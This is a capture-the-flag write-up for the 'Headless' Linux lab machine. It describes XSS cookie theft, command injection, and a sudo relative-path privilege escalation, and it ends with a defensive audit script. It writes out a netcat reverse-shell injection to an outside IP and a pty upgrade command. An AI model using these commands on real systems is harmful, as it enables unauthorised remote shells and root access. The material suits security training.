Season 4
Headless-Easy-Linux
Port scan first
22/tcp open ssh
5000/tcp open upnp
Port 5000 serves a web app; directory scanning finds a /dashboard route that returns 401.
The page offers a support feature, which looks like the place to land an XSS.
Inserting XSS into the Message field triggers an error.
So can XSS be inserted at that position in a way that the backend bot still visits it?
Put the payload in the User-Agent header and set the message to malicious characters so the error page is produced.
That yields the admin's cookie; access /dashboard with that cookie.
There is a command injection; separating with a semicolon gets the first flag.
Pop a shell, then upgrade to a full shell
;nc 10.10.16.16 7777 -e /bin/bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo privileges
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck
Contents of syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
    exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
    /usr/bin/echo "Database service is not running. Starting it..."
    ./initdb.sh 2>/dev/null
else
    /usr/bin/echo "Database service is running."
fi

exit 0
When no initdb.sh process is found, the script runs ./initdb.sh relative to the caller's current directory (while running as root via sudo); use that to write the flag to a file.
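The weakness above is a root-run sudo script invoking a helper by relative path. As an added audit helper (not from the writeup or the box), the following scans a script for commands executed via `./` or `../`, the check one would run over every NOPASSWD target; the sample scripts and the `/opt/db/initdb.sh` path in the hardened copy are constructed assumptions.

```shell
# Audit helper (added example, not part of the original writeup): flag lines in
# a sudo-runnable script that execute a command through a relative path. Such a
# path resolves against the sudo caller's working directory, not the script's.

# find_relative_execs FILE
# Prints "lineno:text" for each non-comment line that runs ./something or
# ../something. Exit status 0 if at least one finding, 1 if none.
find_relative_execs() {
    local file="$1"
    grep -nE '(^|[[:space:];&|])\.{1,2}/[^[:space:]]+' "$file" \
        | grep -vE '^[0-9]+:[[:space:]]*#'
}

# sudo_script_is_safe FILE
# Exit status 0 when no relative-path execution is present, 1 otherwise.
sudo_script_is_safe() {
    if find_relative_execs "$1" >/dev/null; then
        return 1
    fi
    return 0
}

# Constructed sample 1: the relevant part of the page's syscheck as it is.
vulnerable=$(mktemp)
cat >"$vulnerable" <<'EOF'
#!/bin/bash
if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
    ./initdb.sh 2>/dev/null
fi
EOF

# Constructed sample 2: same logic with an absolute path (assumed location
# /opt/db/initdb.sh), so the caller's cwd no longer matters.
hardened=$(mktemp)
cat >"$hardened" <<'EOF'
#!/bin/bash
# helper is referenced by absolute path; only root-writable dirs should hold it
if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
    /opt/db/initdb.sh 2>/dev/null
fi
EOF

# Report both results when run directly.
for f in "$vulnerable" "$hardened"; do
    if sudo_script_is_safe "$f"; then
        echo "OK: no relative execs in $f"
    else
        echo "FINDING in $f:"; find_relative_execs "$f"
    fi
done
```

Besides fixing the path, the helper's directory must not be writable by the sudo caller, otherwise an absolute path changes nothing.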